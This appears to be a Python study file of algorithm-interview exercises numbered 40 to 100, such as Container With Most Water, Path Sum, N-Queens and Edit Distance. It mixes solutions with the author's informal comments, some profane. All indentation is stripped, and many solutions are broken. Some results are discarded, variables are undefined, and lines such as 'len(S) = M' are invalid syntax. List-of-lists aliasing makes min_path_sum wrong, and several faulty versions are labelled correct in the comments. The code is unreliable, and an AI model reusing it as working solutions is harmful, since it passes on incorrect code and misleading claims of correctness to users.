prev = current
current = []
return result
"""
# 40. Container With Most Water
# Thinking this (i, ai) and (i, 0)
# so for pair (m, n)
# area is abs(m-n) * min(am, an)
def most_water(plist):
max_volumn = 0
for i, pm in enumerate(plist):
for pn in plist[i+1:]:
max(max_volumn, calculate_area(pm, pn))
return max_volumn
def calculate_area(pm, pn):
return abs(pm[0] - pn[0]) * min(pm[1], pn[1])
# My algorithm is correct, this use greedy algorithm
def maxArea(height):
n = len(height)
i = 0
j = n - 1
max_area = 0
while i < j:
max_area = max(max_area, (j - i) * min(height[i], height[j]))
if height[i] <= height[j]:
i += 1
else:
j -= 1
return max_area
# 41. Minimum Path Sum
# Strong feel that I did correctly, but need to check more. The result on website is almost same with mine
# Online result is doing a map, each point is the sum till current position.
def min_path_sum(grid):
return min_path_helper(grid, m, n, 0)
def min_path_helper(grid, m, n, sum):
if (m, n) == (0, 0):
return sum
elif m == 0 or n == 0: # Reach the bound
if m == 0:
return min_path_helper(m, n-1, sum+grid[m][n])
else:
return min_path_helper(m-1, n, sum+grid[m][n])
else: # Normal one
return min(min_path_helper(m, n-1, sum+grid[m][n]), min_path_helper(m, n-1, sum+grid[m][n]))
# Above is the recursive way. I think iterative way should be better
def min_path_sum(grid):
m = len(grid[0])
n = len(grid)
t = [ [0] * m ] * n
for j in range(m): # Go up/left doesnt' matter, important is result
for i in range(n):
if i == 0 and j ==0:
t[i][j] = grid[i][j]
elif i == 0:
t[i][j] = t[i][j-1] + grid[i][j]
elif j == 0:
t[i][j] = t[i-1][j] + grid[i][j]
else:
t[i][j] = min(t[i-1][j], t[i][j-1]) + grid[i][j]
return t[m-1][n-1]
# 42. Search a 2D Matrix
# !! Remember that binary search is start <= end !!!!
def searchMatrix(matrix, target):
start = 0
end = len(matrix) -1 # -1 !!!
while start <= end:
mid = (start + end) / 2
if matrix[mid][0] <= target and target <= matrix[mid][-1]:
col = mid
start = 0
end = len(matrix[0]) -1 # -1!!!
while start <= end:
mid = (start + end) / 2
if target == matrix[row][mid]:
return True
elif target < matrix[row][mid]:
end = mid - 1
else:
start = mid + 1
return False
elif target < matrix[mid][0]:
end = mid-1
else:
start = mid + 1
return False
# This is better, nested matrix
"""
Generate m*n matrix
a = 0
m = []
for i in range(10):
row = []
for j in range(8):
row.append(a)
a += 1
m.append(row[:])
"""
"""
def search_2d_matrix(matrix, target):
m = len(matrix[0])
n = len(matrix)
start = 0
end = n - 1
while start < end:
row_mid = (start+end)/2
if matrix[row_mid][0] <= target and matirx[row_mid][-1] >= target: # search for this row
start = 0
end = m-1
while start <= end:
col_mid = (start+end)/2
if matrix[row_mid][col_mid] == target:
return True
elif matrix[row_mid][col_mid] > target: # need to search front half
end = mid -1
else:
start = mid + 1
return False
elif matrix[row_mid][0] > target: # search for front half
end = row_mid - 1
else:
start = row_id + 1
return False
"""
# 43. Set Matrix Zeroes
# There's a better way which can save the space of doing so'
def set_matirx_0(matrix):
n = len(matrix[0])
m = len(matrix)
zero_row = False
zero_col = False
for i in range(m):
for j in range(n):
if matrix[i][j] == 0:
if i == 0:
zero_row = True
if j == 0:
zero_col = True
matrix[i][0] = matrix[0][j] = 0
for i in range(1, m):
for j in range(1, n):
if matrix[i][0] == 0 or matrix[0][j] == 0:
matrix[i][j] = 0
if zero_col:
for i in range(m):
matrix[i][0] = 0
if zero_row:
for j in range(n):
matrix[0][j] = 0
return matrix
# 44. Path Sum
# in a pretty good shape
def has_path_sum(root, target):
if root is None:
return False
elif root.left is None and root.right is None: # Found a leaf
if target == root.data:
return True
else:
return False
else:
target -= root.data
return has_path_sum(root.left, target) or has_path_sum(root.right, target)
# 45. Remove Duplicates from Sorted Array II
# Note: we have 4 types of questions: Remove dup from sorted array i/ii and list i/ii
def remove_dup_array_II(array):
current = 0
counter = 0
n = len(array)
for i in range(1, n):
if array[i] == array[i-1]: # Found a dup
counter += 1
else:
if counter > 0:
pass
else:
array[current] = array[i-1]
current += 1
counter = 0
if counter == 0:
array[current] = array[n-1]
current += 1
if current > 1:
return array[:current]
else:
return []
# 46. Spiral Matirx II
def spiral_matrix_II(n):
matrix = [[0 for i in range(n)] for j in range(n)]
start_row = start_col = 0
end_row = end_col = n -1
num = 1
while start_row < end_row and start_col < end_col:
for i in range(start_col, end_col+1): # Go right
matrix[start_row][i] = num
num += 1
for i in range(start_row+1, end_row+1): # Go down
matrix[i][end_col] = num
num += 1
for i in range(end_col-1, start_col-1, -1): # Go left
matrix[end_row][i] = num
num += 1
for i in range(end_row-1, start_row, -1): # Go up
matrix[i][start_col] = num
num += 1
start_row += 1
start_col += 1
end_row -= 1
end_col -= 1
if n % 2 == 1:
matrix[start_row][start_col] = num
return matrix
# 47. Pascal's Triangle II
def pascal_triangle_II(n):
from collections import deque
result = deque()
for i in range(n-1):
for j in range(0, len(result)-1):
result[j] = result[j] + result[j+1]
result.appendleft(1)
return result
# 48. Combinations
# Remember in this question, result need to use result[:] as copy
# Simpler way
def combine(n, k):
ret =[]
combine_helper(1, n, k, [], ret)
return ret
def combine_helper(cur, n, k, res, ret):
if len(res) == k:
ret.append(res[:])
return
for i in range(cur, n+1):
res.append(i)
combine_helper(i+1, n, k, res, ret)
res.pop()
"""
def combine(n, k):
ret = []
def combine_helper(result):
if len(result) == k:
ret.append(result[:])
return
elif len(result) == 0:
start = 1
else:
start = result[-1] + 1
if start > n:
return
else:
for i in range(start, n+1):
result.append(i)
combine_helper(result)
result.pop()
combine_helper([])
print ret
"""
# 49. Search in Rotated Sorted Array II/I
# Don't be afraid of this problem. It's very simple once you know what to do
# This is not correct for array[mid] > array[start]
# Should use array[mid] > array[end] instead
def search_rot_array_i(array, target):
start = 0
end = len(array) - 1
while start <= end:
mid = (start + end) / 2
if target == array[mid]:
return True
if array[mid] >= array[start]: # First half sorted
if array[start] <= target and target < array[mid]:
end = mid - 1
else:
start = mid + 1
else: # Second half sorted
if array[mid] < target and target <= array[end]:
start = mid + 1
else:
end = mid -1
return False
# Introducing the situation that dupliate element, but actually they are same
# When there are dup element, just keep on moving
def search_rot_arrary_II():
start = 0
end = len(array) - 1
while start <= end:
mid = (start + end) / 2
if target == array[mid]:
return True
if array[mid] > array[start]: # First half sorted
if array[start] <= target and target < array[mid]:
end = mid - 1
else:
start = mid + 1
elif array[mid] < array[start]: # Second half sorted
if array[mid] < target and target <= array[end]:
start = mid + 1
else:
end = mid -1
else: # array[mid] == array[start]
start += 1
return False
# 50. Remove Nth Node From End of List
# Too lazy to check if it is correct
def remove_nth_end(head, n):
if head is None:
return
slow = head
fast = head
for i in range(n):
if fast.next is None:
return
fast = fast.next
while fast is not None:
fast = fast.next
slow = slow.next
return slow.data
# 51. Populate Next Right Pointers in Each Node II
# A bit hard to think, need to slow down
def pop_next_pointers_ii(root):
if root is None:
return
head = None
prev = None
while root is not None:
while root is not None:
if root.left is not None:
if prev is None:
prev = head = root.left
else:
prev.next = root.left
prev = prev.next
if root.right is not None:
if prev is None:
prev = head = root.right
else:
prev.next = root.right
prev = prev.next
root = root.next
root = head
prev = None
head = None
return
# 52. Palindrome Number
def palindrome(num):
if num < 0:
return False
div = 10
while num/div > 0:
div *=10
while num > 0:
left_bit = num/div
right_bit = num % 10
if left_bit != right_bit:
return False
else:
num = (num % div) / 10
div /= 100
return True
# 53. Minimum Depth of Binary Tree
def min_depth_of_bt(root):
if root is None:
return 0
if root.left is None and root.right is None:
return 1
elif root.left is None:
return min_depth_of_bt(root.right) + 1
elif root.right is None:
return min_depth_of_bt(root.left) + 1
else:
return min(min_depth_of_bt(root.left), min_depth_of_bt(root.right)) + 1
# 54. Sum Root to Leaf Numbers
def sum_root_to_leaf(root):
if root is None:
return 0
result = 0
def sum_root_to_leaf_helper(node,value):
value = value * 10 + node.data
if node.left is None and node.right is None:
result += value
return
if node.left is not None:
sum_root_to_leaf_helper(node.right, value)
if node.right is None:
sum_root_to_leaf_helper(node.left, value)
sum_root_to_leaf_helper(root,root.data)
# 55. Length of Last Word
# This a python way, even not the python way, it's too easy
def lengthOfLastWord_1(s):
if len(s.strip()) == 0: # Need to check if len(s) is 0
return 0
return len(s.strip().split()[-1]) # Python way
def lengthOfLastWord_2(s): # My way
n = len(s) - 1
while n >= 0 and s[n] == ' ':
n -= 1
i = 0
while n >= 0 and s[n] != ' ':
n -= 1
i += 1
return i
def lengthOfLastWord_3(s): # Annie way
n = len(s) - 1
res = 0
while n >= 0:
if s[n] != ' ':
res += 1
elif res > 0:
break
n -= 1
return res
"""
Too Sen Po Ah me
def len_last_word(str):
word_list = str.split(' ')
return len(word_list[-1])
def len_lst_word(str):
if str[-1] == ' ':
return 0
for i, char in enumerate(str[::-1]):
if char == ' ':
return i
"""
# 56. Trapping Rain Water
def trap(A):
N = len(A)
if N == 0:
return 0
left_to_right = [0 for i in range(N)]
right_to_left = [0 for i in range(N)]
max_left = A[0]
max_right = A[N-1]
for i in range(N):
max_left = max(max_left, A[i])
left_to_right[i] = max_left
max_right = max(max_right, A[N-1-i])
right_to_left[N-1-i] = max_right
water = 0
for i in range(N):
water += min(left_to_right[i], right_to_left[i]) - A[i] # Note here
return water
# 57. Search in Rotated Sorted Array
# See 49.
# 58. Valid Parenetheses
# Simpler code
def isValid(s):
bracket_dict = { '[' : ']',
'{' : '}',
'(' : ')',
}
stack = []
for bracket in s:
if bracket in bracket_dict.keys():
stack.append(bracket)
elif len(stack) == 0 or bracket !=bracket_dict[stack.pop()]:
return False
return len(stack) == 0
"""
# Remember, here cannot use dict() to define '[' as a key
def valid_paren(parens):
pair = { '[' : ']',
'{' : '}',
'(' : ')'}
if parens[0] in [']','}',')']:
return False
stack = []
stack.append(parens[0])
for i in range(1, len(parens)):
if parens[i] in ['[','{','(']:
stack.append(parens[i])
else:
if not stack:
return False
current = stack[-1]
if pair.get(current) != parens[i]:
return False
else:
stack.pop()
if stack:
return False
return True
"""
# 59. Valid Sudoku
def valid_sudoku(board):
if len(board) != 9 or len(board[0]) !=9:
return False
for i in range(9):
row = []
column = []
for j in range(9):
if board[i][j] != '.':
if board[i][j] in row:
return False
else:
row.append(board[i][j])
if board[j][i] != '.':
if board[j][i] in column:
return False
else:
column.append(board[j][i])
for i in range(0,9,3):
for j in range(0,9,3):
for x in range(i, +3):
for y in range(j, j+3):
if board[x][y] == '.':
continue
if board[x][y] in num:
return False
else:
num.append(board[x][y])
return True
# 60. Path Sum II
# Should be correct
def path_sum_ii(root, target):
if root is None:
return []
paths = []
def path_sum_helper(node, result, target):
result.append(node.value)
if node.left is None and node.right is None and target == node.data:
paths.append[result[:]]
return
elif target <= node.data: # Stop this path
result.pop()
return
else: # target > 0, child exist
if node.left is not None:
path_sum_helper(node.left, result, target-node.data)
if node.right is not None:
path_sum_helper(node.right, result, target-node.data)
result.pop()
path_sum_helper(root, [], target)
# 61. Subsets
def subsets(S):
ret = []
subsets_helper(0, sorted(S), [], ret)
return ret
def subsets_helper(i, S, res, ret):
if i == len(S):
ret.append(res[:])
return
subsets_helper(i+1, S, res, ret) # No element i
res.append(S[i])
subsets_helper(i+1, S, res, ret) # With element i
res.pop()
"""
New answer has better understanding
# SOOOOOOO Niu Bi
def sub_sets(list):
ret = [[]]
def sub_sets_helper(result, list):
for i, item in enumerate(list):
result.append(item)
ret.append(result[:])
sub_sets_helper(result, list[i+1:])
result.pop()
sub_sets_helper([], list)
return ret
"""
# 62. Unique Path
# check 37
def unique_path_ii():
pass
# 63. Jump Game
# Better way to do this, think as a dp
def jump_game(jump_list):
N = len(jump_list)
start = 0
max_cover = 0
while start <= max_cover and max_cover < N-1:
max_cover = max(start+jump_list[start], max_cover)
start += 1
return max_cover >= N-1
# So many boundary problem
def jump_game(jump_list):
length = len(jump_list)
for i, height in enumerate(jump_list[::-1]):
if height == 0:
require = 1
location = length - i - 1
while location >= 0:
if require < jump_list[location]:
break
else:
require += 1
location -= 1
if location < 0:
return False
return True
# 64. Flatten Binary Tree to Linked List
# This is different from the web, need to check if this is also correct
def flat_bt(root):
if root is None:
return None
if head is None:
head = root
else:
head.next = root
head = head.next
flat_bt(root.left)
flat_bt(root.right)
root.left is None
root.right is None
# 65. Longest Consecutive Sequence
def longestConsecutive_2(num):
if len(num) <= 1:
return len(num)
ret = 1
for i in num[:]:
if i not in num:
continue
length = 1
j = i
while j+1 in num:
length += 1
num.remove(j+1)
j += 1
j = i
while j-1 in num:
length += 1
num.remove(j-1)
j -= 1
ret = max(ret, length)
num.remove(i)
return ret
"""
Better way above, not using anything
Also need to remember should use two direction find
def longest_con_seq(list):
from sets import Set
d = Set
longest = 1
for i in list:
if i not in d:
d.add(i)
for item in d:
cur = item
cur_len = 1
while cur+1 in d:
cur_len += 1
cur +=1
longest = max(longest, cur_len)
return longest
"""
# 66. Subsets II
# There's another version of doing subsets. But almost the same.
def sub_sets_ii(list):
ret = [[]]
def sub_sets_helper(result, list):
for i, item in enumerate(list):
result.append(item)
if result[:] not in ret:
ret.append(result[:])
sub_sets_helper(result, list[i+1:])
result.pop()
sub_sets_helper([], list)
return ret
# 67. Longest Common Prefix
# Tricky is no need to set flag or anything. Just return the result
def longest_common_prefix(list_str):
if len(list_str) == 0:
return None
elif len(list_str) == 1:
return list_str[0]
compare = list_str[0]
length = len(compare)
i = 0
while i < length:
for stri in list_str[1:]:
if i > len(stri)-1 or stri[i] != compare[i]:
return compare[:i]
i += 1
return compare
# Use a quick way but not the Big-O best one
def commonprefix(m):
"Given a list of pathnames, returns the longest common leading component"
if not m: return ''
s1 = min(m)
s2 = max(m)
print s1, s2
for i, c in enumerate(s1):
if c != s2[i]:
return s1[:i]
return s1
# 68. Search for a Range
# Perfect for one time
def search_for_range(target, list):
start = 0
end = len(list) - 1
while start <= end:
mid = (start + end) / 2
if list[mid] == target:
start = end = mid
while True:
if list[start] != target and list[end] != target:
return (start+1, end-1)
if list[start] == target:
start -= 1
if list[end] == target:
end += 1
elif list[mid] < target: # need to search second half
start = mid + 1
else:
end = mid - 1
return (-1,-1)
# 69. 3 Sum Closest
# This time cannot remember it. This is a weird solution. Need to think hard next time.
def three_sum_closest(list, target):
list.sort()
n = len(list)
res = list[0] + list[1] + list[2]
for i in range(n-2):
start = i + 1
end = n - 1
sum = list[i] + list[start] + list[end]
if abs(sum-target) < abs(res-target):
res = sum
if sum == target:
return sum
elif sum < target:
start += 1
else:
end -= 1
return res
# 70. Convert Sorted List to Binary Search Tree
# A bit tricky when need to check head == slow
def convert_to_bst(head):
if head is None:
return None
slow = head
fast = head
prev = None
while fast.next is not None and fast.next.next is not None:
prev = slow
fast = fast.next.next
slow = slow.next # slow is what we are looking for
if head == slow:
head = None
# Create two separate linklists
if prev is not None:
prev.next = None
node = Node(slow.data)
node.left = convert_to_bst(head)
node.right = convert_to_bst(slow.next)
return node
# 71. Count and Say
# Will use the num as itself here. So easy
def count_n_say(string):
result = ''
prev = string[0]
count = 1
for char in string[1:]:
if char == prev:
count += 1
else:
result += str(count) + ' ' + prev
if count > 1:
result += 's '
else:
result += ' '
prev = char
count = 1
result += str(count) + ' ' + prev
if count > 1:
result += 's'
return result
# 72. Triangle
# way to thinking is too diao
def triangle(triangle):
if triangle is None:
return 0
for i in range(len(triangle) - 2, -1, -1):
for j, value in enumerate(triangle[i]):
triangle[i][j] = triangle[i][j] + min(triangle[i+1][j], triangle[i+1][j+1])
return triangle[0][0]
# 73. Unique Binary Search
# Remember it's multiply but not plus
# Wrong one, this is unique bst i, but not ii
def unique_bs(list):
if len(list) <= 2:
return len(list)
result = 0
for i, num in enumerate(list):
result += unique_bs(list[:i]) * unique_bs(list[i+1:])
return result
# Need to write this again
def unique_bs_ii(n):
a = range(1, n + 1)
return unique_bs_ii_helper(a)
def unique_bs_ii_helper(a):
if not a:
return [None]
else:
res = []
for i, c in enumerate(a):
left = unique_bs_ii_helper(a[:i])
right = unique_bs_ii_helper(a[i + 1:])
for l in left:
for r in right:
root = TreeNode(c)
root.left = l
root.right = r
res.append(root)
return res
# 74. Binary Tree Zigzag Level Order Traversal
def zizag_traversal(root):
result = [[root]]
prev = deque(root)
normal_order = False
current = deque()
while len(prev) > 0
while len(prev) > 0:
node = prev.pop()
if normal_order:
if node.left is not None:
current.append(node.left)
if node.right is not None:
current.append(node.right)
else:
if node.right is not None:
current.append(node.right)
if node.left is not None:
current.append(node.left)
if len(current) > 0:
result.append(current)
prev = current
normal_order = not normal_order
return result
# 75. Partition List
def partition(head, x):
before_dummy = ListNode(0)
after_dummy = ListNode(0)
before_cur = before_dummy
after_cur = after_dummy
while head is not None:
if head.val < x:
before_cur.next = head
before_cur = before_cur.next
head = head.next
before_cur.next = None
else:
after_cur.next = head
after_cur = after_cur.next
head = head.next
after_cur.next = None
if before_dummy.next is not None:
before_cur.next = after_dummy.next
return before_dummy.next
else:
return after_dummy.next
"""
Above solution using dummy will be a lot easier
def partition_list(head, target):
if head is None:
return None
while head is not None:
if head.data <= target:
if left_start is None:
left_start = head
left_end = left_start
else:
left_end.next = head
left_end = left_end.next
else:
if right_start is None:
right_start = head
right_end = head
else:
right_end.next = head
right_end = right_end.next
head = head.next
if left_start is None:
return right_start
else:
left_end.next = right_start
return left_start
"""
# 76. Combination Sum
# Don't forget to use copy[:]
def combinationSum(candidates, target):
ret = []
combinationSum_helper(sorted(candidates), target, [], ret) # Look into the question, need sorted
return ret
def combinationSum_helper(candidates, target, res, ret):
if target < 0:
return
elif target == 0:
ret.append(res[:])
return
for i, num in enumerate(candidates):
res.append(num)
combinationSum_helper(candidates[i:], target - num, res, ret)
res.pop()
"""
def comb_sum(list, target):
ret = []
def comb_sum_helper(list, target, result):
if target < 0:
return
elif target == 0:
ret.append(result[:])
return
for i in list:
result.append(i)
comb_sum_helper(list[i:], target-i, result)
result.pop()
comb_sum_helper(list, target, [])
return ret
"""
# Combination Sum II
# No duplicate item should be used, what I see diff is list[i:] or list[i+1:], needs to be tested
# Bei Ni Ya Cai Dui le
# 77. Pow(x,n)
# WTF is this???
def pow_func(x,n):
if n ==0:
return 1
elif n < 0:
return 1 / pow_func(x, -n)
else:
v = pow_func(x, n/2)
if n % 2 ==0:
return v*v
else:
return v*v*x
# 78. Construct Binary Tree from Inorder and Postorder Traversal
def contruct_bt_ip(preorder, inorder):
if len(inorder) == 0:
return None
root = treeNode(preorder.pop(0))
root_index = inorder.index(root.data)
root.left = construct_bt_ip(preorder, inorder[:root_index])
root.right = construct_bt_ip(preorder, inorder[root_index+1:])
return root
# 79.Letter Combination of a Phone Number
# Easy piece
def phone_num(digits):
digit_map = {
'2': 'abc',
'3': 'def',
'4': 'ghi',
'5': 'jkl',
'6': 'mno',
'7': 'pqrs',
'8': 'tuv',
'9': 'wxyz',}
ret = []
def phone_num_helper(i, digits, result):
if i == len(digits):
ret.append(result[:])
return
for char in digit_map[digits[i]]:
result.append(char)
phone_num_helper(i+1, digits, result)
result.pop()
phone_num_helper(0,digits,[])
return ret
# 80. FUCK this is empty
# 81. Construct Binary Tree from Preorder and Inorder Traversal
# Should be correct. This is almost the same to 78
def contruct_bt_pi(postorder, inorder):
if len(inorder) == 0:
return None
root = treeNode(postorder.pop())
root_index = inorder.index(root.data)
root.left = construct_bt_pi(postorder, inorder[:root_index])
root.right = construct_bt_pi(postorder, inorder[root_index+1:])
return root
# 82. Palindrome Partitioning
# Not 100% sure it's correct, but will discuss it later
def palin_parti(string):
ret = []
def palin_parti_helper(s, result):
if not s:
ret.append(result[:])
else:
for i in range(len(s)):
if is_palindrome(s[:i+1]):
result.append(s[:i+1])
palin_parti_helper(s[i+1:], result)
result.pop()
def is_palindrome(s):
start = 0
end = len(s) -1
while start < end:
if s[start] != s[end]:
return False
start += 1
end -= 1
return True
# 83. Reverse Linked List II
# Really don't want to think about it right now
def reverse_list_ii(head, m, n):
i = 1
while head is not None and i <= n:
if i < m-1:
head = head.next
i += 1
elif i == m-1:
start_tail = head
reverse_end = head.next
prev = None
head = head.next
i += 1
elif i >=m and i <n:
next = head.next
head.next = prev
prev = head
head = next
i += 1
elif i == n:
start_tail.next = reverse_head
reverse_end.next = head.next
# 84. N-Queens
# There's also n queens ii
# I think this is correct, but need deep validation
# valid check isn't efficient
# This is not correct, n queens question is n*n chessboard but not always 8*8
def solveNQueens(n):
ret = []
res = ['.'*n for i in range(n)]
solveNQueens_helper(n, res, ret, 0)
return ret
def solveNQueens_helper(n, res, ret, queens):
if queens == n:
ret.append(res[:])
return
for i in range(n):
new_row = '.'*n
res[queens] = new_row[:i] + 'Q' + new_row[i+1:]
if is_valid(res, queens, i):
solveNQueens_helper(n, res, ret, queens+1)
res[queens] = new_row
def is_valid(board, row, col):
for i in range(row):
for j in range(len(board[0])):
if board[i][j] == 'Q' and (j == col or abs(row-i) == abs(col-j)):
return False
return True
"""
def n_queens(n):
result = ['.' for i in range(8)]
ret = []
def n_queens_helper(i, result, queens):
if queens == 0:
ret.append(result[:])
for j in range(8):
result[i] = j
if is_valid_result(result, i):
n_queens_helper(i+1, result, queens-1)
result[i] = '.'
def is_valid_result(result, i):
for j in range(i):
if result[i] == result[j] or abs(result[i]-result[j]) == abs(i-j):
return False
return True
n_queens_helper(0, result, n)
return ret
def n_queens_ii(n):
result = ['.' for i in range(8)]
ret = 0
def n_queens_helper(i, result, queens):
if queens == 0:
ret += 1
for j in range(8):
result[i] = j
if is_valid_result(result, i):
n_queens_helper(i+1, result, queens-1)
result[i] = '.'
def is_valid_result(result, i):
for j in range(i):
if result[i] == result[j] or abs(result[i]-result[j]) == abs(i-j):
return False
return True
n_queens_helper(0, result, n)
return ret
# Don't know what's the diff, just return a num += 1
"""
# 85. Validate Binary Search Tree
# Best way to do this in recursion
def valid_bst(root):
return valid_bst_helper(root, INT_MIN, INT_MAX)
def valid_bst_helper(node, min, max):
if node is None:
return True
if node.data <= min or node.data >= max:
return False
return valid_bst_helper(node.left, min, node.data) and valid_bst_helper(node.right, node.data, max)
# 86. Add Binary
# Pad with zeros
def add_binary(a, b):
int_a = [ int(i) for i in a]
int_b = [ int(i) for i in b]
carry = 0
result = []
la = len(int_a)
lb = len(int_b)
if la > lb:
int_b = [0 for i in range(la-lb)] + int_b
lb = len(int_b)
else:
int_a = [0 for i in range(lb-la)] + int_a
la = len(int_a)
for i in range(1, la+1):
curr_bit = (int_a[-i] + int_b[-i] + carry) % 2
carry = (int_a[-i] + int_b[-i] + carry) / 2
result.insert(0, str(curr_bit))
if carry == 1:
result.insert(0, '1')
return ''.join(result)
# 87. Next Permutation:
def nextPermutation(num):
if len(num) <= 1:
return num
i = len(num) - 1
while i > 1 and num[i-1]>= num[i]: # It's >=
i -= 1
num = num[:i] + sorted(num[i:])
if i == 0:
return num
j = i
while j < len(num) and num[i-1] >= num[j]: # again >=
j += 1
swap(i-1, j, num)
return num
def swap(i, j, num):
tmp = num[i]
num[i] = num[j]
num[j] = tmp
"""
Wrong answer, this not sorting the rest list
def next_perm(list):
l = len(list)
for i in range(1, l):
for j in range(i+1, l+1):
if list[-i] > list[-j]:
tmp = list[-i]
list[-i] = list[-j]
list[-j] = tmp
return list
return list[::-1]
"""
# 88. Permutations II
# First redo the permutation_i
# Pay attention to this!!!! len(a) == 0 != a is None
def perm_i(list):
if len(list) == 0:
return [[]]
res = []
for i, e in enumerate(list):
rest = list[:i] + list[i+1:]
rest_perm = perm_i(rest)
for perm in rest_perm:
res.append( [e,] + perm)
return res
# Nothing much diff. But use a dict to note which ones are used
def permutations_ii(list):
d = {}
def perm_ii(list):
if len(list) == 0:
return [[]]
res = []
for i, e in enumerate(list):
if e in d:
continue
else:
d[e] = True
rest = list[:i] + list[i+1:]
rest_perm = perm_i(rest)
for perm in rest_perm:
res.append( [e,] + perm)
return res
return perm_ii(list)
# 89. Remove Duplicates from Sorted List II
# So many traps. Need to remember to set unused.next = None
"""
This is something I really need dummy here
I don't even want to look at this answer again
def remove_dup_from_list_ii(head):
prev = head
current = head.next
unique_head = None
last = None
while current is not None:
if prev.data == current.data:
while current is not None and current.data == prev.data:
current = current.next
if current is not None:
prev = current
current = current.next
else:
if unique_head is None:
unique_head = prev
last = prev
else:
last.next = prev
last = last.next
last.next = None
prev = current
current = current.next
return unique_head
"""
# 90. Insertion Sort List\
def insertionSortList(self, head):
dummy = ListNode(-9223372036854775807-1)
dummy.next = head
cur = dummy
while cur.next is not None:
if cur.val < cur.next.val:
cur = cur.next
else:
insert = cur.next
cur.next = insert.next
start = dummy
while start.val < insert.val:
prev = start
start = start.next
prev.next = insert
insert.next = start
return dummy.next
# Write everything in one func MAY increase the speed of processing
# Made a mistake here, pasted the code to Sort List and coulnd't pass...
# 1. The insertion sort shown in wiki, will check from back to front. It's the same to check from front-back
"""
# Sister is too niubi
# Inpired by the dummy here
def insertion_sort_list(head):
dummy = Node(0)
dummy.next = head
current = head
while current.next is not None:
if current.next.data >= current.data:
current = current.next
else:
insert(dummy, current, current.next)
return dummy.next
def insert(dummy, tail, node):
current = dummy
while node.data > current.nextdata:
current = current.next
tail.next = node.next
node.next = current.next
current.next = node
"""
# 91. Edit Distance
# Same to the C anwser, need to understand the meaning of M, N, also the boundary
def edit_distance(word1, word2):
M = len(word1)
N = len(word2)
dp= [ [None for i in range(M+1)] for j in range(N+1)]
for j in range(N+1):
dp[j][0] = j
for i in range(M+1):
dp[0][i] = i
for j in range(1, N+1):
for i in range(1, M+1):
if word1[i-1] == word2[j-1]:
dp[j][i] = dp[j-1][i-1]
else:
dp[j][i] = min(dp[j-1][i], dp[j][i-1], dp[j-1][i-1]) + 1
return dp[N][M]
# 92. Reverse Nodes in k-Group
# Personal written
def reverseKGroup(head, k):
if k <= 1:
return head
dummy = ListNode(0)
dummy.next = head
total_nodes = 0
cur = head
while cur is not None:
cur = cur.next
total_nodes += 1
n = total_nodes / k
prev = dummy
while n > 0:
i = 1
cur = prev.next
while i < k:
move = cur.next
cur.next = move.next
move.next = prev.next
prev.next = move
i += 1
prev = cur
n -= 1
return dummy.next
"""
From annie's
# Remember the way to play the list node
def reverse_nodes_in_k(head, k):
dummy = Node(0)
dummy.next = head
length = get_len(head)
reverse_time = length / k
ins = dummy
current = head
while reverse_time > 0:
for i in range(k-1):
move = current.next
current.next = move.next
move.next = current
ins.next = move
ins = current
current = current.next
reverse_time -= 1
return dummy.next
def get_len(head):
len = 0
while head is not None:
head = head.next
len += 1
return len
"""
# 93. Gas Station
# Couldn't understand
def gas_station(gas,cost):
N = len(gas)
diff = []
for i in range(N):
diff.append(gas[i]-cost[i])
sum = 0
start_node = 0
left_gas = 0
for i in range(0, N):
left_gas += diff[i]
sum += diff[i]
if sum < 0:
start_node = i+1
sum = 0
if left_gas < 0:
return -1
else:
return start_node
# 94. Combination Sum II
# Fucking moji
def comb_sum_ii(list, target):
ret = []
N = len(list)
sorted(list)
def comb_sum_helper(i, target, result):
if target < 0:
return
elif target == 0:
ret.append(result[:])
for j in range(i,N):
if j<N-1 and list[j+1] == list[j]:
continue
result.append(list[j])
comb_sum_helper(j+1, target-list[j], result)
result.pop()
comb_sum_helper(0, target, [])
return ret
# 95. Distinct Subsequences
# Need a better understanding in DP
def distinct_subs(S, T):
len(S) = M
len(T) = N
dp = [ [0 for i in range(M+1)] for j in range(N+1)]
dp[0][0] = 1
for j in range(N+1):
dp[j][0] = 1
for i in range(M+1):
dp[0][j] = 1
for i in range(1, M+1):
for j in range(1, N+1):
if S[j-1] == T[i-1]:
dp[i][j] = dp[i][j-1] + dp[i-1][j-1]
else:
dp[i][j] = dp[i][j-1]
return dp[M][N]
# Why not this?
def distinct_subs(S, T):
result = 0
def distinct_helper(T):
if len(T) == 0:
return
if T in S:
result += 1
for i, char in enumerate(T):
distinct_helper(T[:i]+T[i+1:])
return distinct_helper(T)
# 96. Jump Game II
# Using a dp way, but there's simpler way without dp
def jump_game_ii(jump_list):
start = 0
N = len(jump_list)
step = [100 for i in range(N)]
step[0] = 1
while start < N:
if start + jump_list[start]+1:
return step[start] + 1
for i in range(start+1, start + jump_list[start]+1):
if i >= N-1:
return 'Will not reach end'
step[i] = min(step[i], step[start]+1)
start += 1
return step[N-1]
# Greedy algorithm. Almost the same. But dp is easier to think but with a O(n) list
def jump_game_ii(jump_list):
N = len(jump_list)
start =0
res = 0
while start < N-1:
res += 1
mx = start
if start + jump_list[start] >= N-1:
return res
for i in range(start+1, start+jump_list[start]+1):
if i + jump_list[i] > mx + jump_list[mx]:
mx = i
start = mx
# 97. Merge k Sorted Lists
def merge_k_sorted_lists(lists):
dummy = Node(0)
current = dummy
q = PriorityQueue()
for head in lists:
if head is not None:
q.push(head)
while len(q) > 0:
node = q.top()
current = current.next = node
if node.next is not None:
q.push(node.next)
return dummy.next
# 98. Zigzag Conversion
# Best result. Remember it's if if if but not if elif ...
def zigzag_convert(str, n):
result = []
zig = 2*n - 2
N = len(str)
for i in range(n):
j = 0
while True:
if i > 0 and i < n-1 and j-i > 0 and j-i < N:
result.append(str[j-i])
if j+1 >0 and j+i < N:
result.append(str[j+i])
if j+i > N:
break
j += zig
return ''.join(result)
# my stupid way
def zigzag_convert(str, n):
result = []
zig = 2*n - 2
N = len(str)
for i in range(n):
j = 0
red_index = 0
while red_index < N:
red_index = j*zig + i
if red_index < N:
result.append(str[red_index])
j += 1
else:
break
if i == 0 or i == n-1:
continue
green_index = j*zig - i
if green_index > 0 and green_index < N:
result.append(str[green_index])
return ''.join(result)
# 99. Anagrams
# Main Idea is to sort and then check each one's letters
def anagrams(list):
d = {}
for s in list:
key = ''.join(sorted(s))
d.setdefault(key,[]).append(s)
for key in d:
if len(d[key]) > 1:
return d[key]
# 100. Add Two Numbers
# Slim version
def add_two_num(l1, l2):
carry = 0
dummy = Node(0)
current = dummy
while l1 is not None or l2 is not None or carry != 0:
sum = carry
if l1 is not None:
sum += l1.data
l1 = l1.next
if l2 is not None:
sum += l2.data
